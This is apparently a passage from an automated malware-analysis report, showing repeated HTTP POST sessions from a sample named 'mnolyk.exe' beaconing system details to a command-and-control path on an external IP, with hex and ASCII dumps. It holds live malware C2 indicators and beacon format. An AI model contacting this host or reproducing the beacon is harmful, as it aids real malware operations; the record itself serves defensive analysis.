                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:48.596528053 CET648INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        448192.168.2.55013862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:48.816931963 CET648OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:48.882236004 CET649INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        449192.168.2.55013962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:49.109385967 CET649OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:49.174504995 CET650INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        45192.168.2.54973562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:51.844624043 CET246OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:51.910830021 CET246INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        450192.168.2.55014062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:49.757097960 CET650OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:49.820137978 CET651INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        451192.168.2.55014162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:50.069927931 CET651OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:50.136013031 CET652INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        452192.168.2.55014262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:50.911528111 CET652OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:50.975814104 CET653INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        453192.168.2.55014362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:51.490211964 CET653OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:51.556133986 CET654INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        454192.168.2.55014462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:51.746608973 CET654OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:51.812130928 CET655INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        455192.168.2.55014562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:51.997575045 CET655OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:52.062042952 CET656INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        456192.168.2.55014662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:52.228127956 CET656OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:52.292440891 CET657INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        457192.168.2.55014762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:52.469913960 CET657OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:52.534677982 CET658INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        458192.168.2.55014862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:52.713607073 CET658OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:52.778877020 CET659INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        459192.168.2.55014962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:52.948054075 CET659OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:53.012109041 CET660INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        46192.168.2.54973662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:52.079669952 CET247OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:52.146827936 CET247INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        460192.168.2.55015062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:53.180274963 CET660OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:53.244153023 CET661INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        461192.168.2.55015162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:53.414299965 CET661OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:53.476975918 CET662INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        462192.168.2.55015262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:53.649178982 CET662OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:53.712241888 CET663INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        463192.168.2.55015362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:53.883683920 CET663OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:53.947201014 CET664INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        464192.168.2.55015462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:54.119780064 CET664OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:54.184797049 CET665INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        465192.168.2.55015562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:54.353665113 CET665OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
